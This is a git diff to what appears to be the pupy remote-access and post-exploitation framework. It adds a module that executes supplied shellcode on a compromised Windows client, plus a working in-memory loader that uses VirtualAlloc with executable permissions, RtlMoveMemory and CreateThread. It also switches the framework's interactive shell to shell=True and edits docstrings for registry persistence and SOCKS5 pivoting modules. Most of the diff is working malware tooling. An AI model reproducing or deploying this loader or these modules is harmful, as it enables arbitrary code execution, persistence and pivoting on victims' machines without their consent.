diff --git a/pupy/modules/persistence.py b/pupy/modules/persistence.py index 65456e3e..9b9af87f 100644 --- a/pupy/modules/persistence.py +++ b/pupy/modules/persistence.py @@ -8,7 +8,7 @@ import string __class_name__="PersistenceModule" class PersistenceModule(PupyModule): - """ Pop up a custom message box """ + """ Enables persistence via registry keys """ def init_argparse(self): self.arg_parser = PupyArgumentParser(prog="persistence", description=self.__doc__) self.arg_parser.add_argument('-m','--method', choices=['registry'], required=True, help='persistence method') diff --git a/pupy/modules/shellcode_exec.py b/pupy/modules/shellcode_exec.py new file mode 100644 index 00000000..db9bafa6 --- /dev/null +++ b/pupy/modules/shellcode_exec.py @@ -0,0 +1,27 @@ +# -*- coding: UTF8 -*- + +''' +Module by @byt3bl33d3r +''' + +from pupylib.PupyModule import * + +__class_name__="ShellcodeExec" + +class ShellcodeExec(PupyModule): + """ executes the supplied shellcode on a client """ + + def init_argparse(self): + self.arg_parser = PupyArgumentParser(prog='shellcode_exec', description=self.__doc__) + self.arg_parser.add_argument('path', help='Path to the shellcode to execute') + + @windows_only + def is_compatible(self): + pass + + def run(self, args): + self.client.load_package("pupwinutils.shellcode") + with open(args.path ,'r') as sfile: + shellcode = sfile.read() + self.client.conn.modules['pupwinutils.shellcode'].exec_shellcode(shellcode) + self.log('Shellcode executed!') \ No newline at end of file diff --git a/pupy/modules/socks5proxy.py b/pupy/modules/socks5proxy.py index ed479889..d57b0d4e 100644 --- a/pupy/modules/socks5proxy.py +++ b/pupy/modules/socks5proxy.py @@ -171,7 +171,7 @@ class ThreadedSocks5Server(SocketServer.ThreadingMixIn, Socks5Server): pass class Socks5Proxy(PupyModule): - """ start a socks5 proxy gooing through a client """ + """ start a socks5 proxy going through a client """ max_clients=1 unique_instance=True daemon=True diff --git a/pupy/packages/all/interactive_shell.py b/pupy/packages/all/interactive_shell.py index 82c4cf79..3c41bac1 100644 --- a/pupy/packages/all/interactive_shell.py +++ b/pupy/packages/all/interactive_shell.py @@ -48,7 +48,7 @@ def interactive_open(program=None, encoding=None): program="/bin/sh" encoding=None print "Opening interactive %s ... (encoding : %s)"%(program,encoding) - p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, close_fds=ON_POSIX, universal_newlines=True) + p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True) q = Queue() q2 = Queue() t = Thread(target=write_output, args=(p.stdout, q)) diff --git a/pupy/packages/windows/all/pupwinutils/shellcode.py b/pupy/packages/windows/all/pupwinutils/shellcode.py new file mode 100644 index 00000000..e709df40 --- /dev/null +++ b/pupy/packages/windows/all/pupwinutils/shellcode.py @@ -0,0 +1,30 @@ +import ctypes +import threading + +def allocate_exe(shellcode): + + ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), + ctypes.c_int(len(shellcode)), + ctypes.c_int(0x3000), + ctypes.c_int(0x40)) + + buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) + + ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), + buf, + ctypes.c_int(len(shellcode))) + + ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), + ctypes.c_int(0), + ctypes.c_int(ptr), + ctypes.c_int(0), + ctypes.c_int(0), + ctypes.pointer(ctypes.c_int(0))) + + ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) + +def exec_shellcode(shellcode): + shellcode = bytearray(shellcode) + t = threading.Thread(target=allocate_exe, args=(shellcode,)) + t.daemon = True + t.start() \ No newline at end of file